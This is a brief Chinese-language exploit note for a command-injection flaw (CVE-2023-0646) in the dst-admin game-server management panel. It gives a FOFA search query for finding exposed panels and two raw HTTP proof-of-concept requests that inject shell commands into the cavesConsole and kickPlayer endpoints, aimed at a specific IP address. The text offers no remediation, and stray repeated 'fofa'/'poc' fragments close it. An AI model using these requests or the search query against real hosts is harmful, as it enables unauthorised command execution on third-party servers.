dst-admincavesConsole远程命令执行漏洞（CVE-2023-0646）

fofa

title=="饥荒管理后台"

poc

POST /home/cavesConsole HTTP/1.1
Host: 101.35.120.58:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Cookie: JSESSIONID=7b0bfc18-03ff-40ec-95aa-5d520734fe18;rememberMe=deleteMe;
Accept-Encoding: gzip
Content-Length: 31

{"command":"\"&ping dnslog;\""}

GET /home/kickPlayer?userId=%5C%22)%5Cn%22%26ping+dnslog%26screen%20-S%20%22DST_CAVES%22%20-p%200%20-X%20stuff%20%22TheNet%3AKick(%5C%22 HTTP/1.1
Host: 101.35.120.58:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cookie: JSESSIONID=5c2ca195-7aa2-4be2-9383-1287e2976132;rememberMe=deleteMe;
Accept-Encoding: gzip

fofa​

poc​

fofa

poc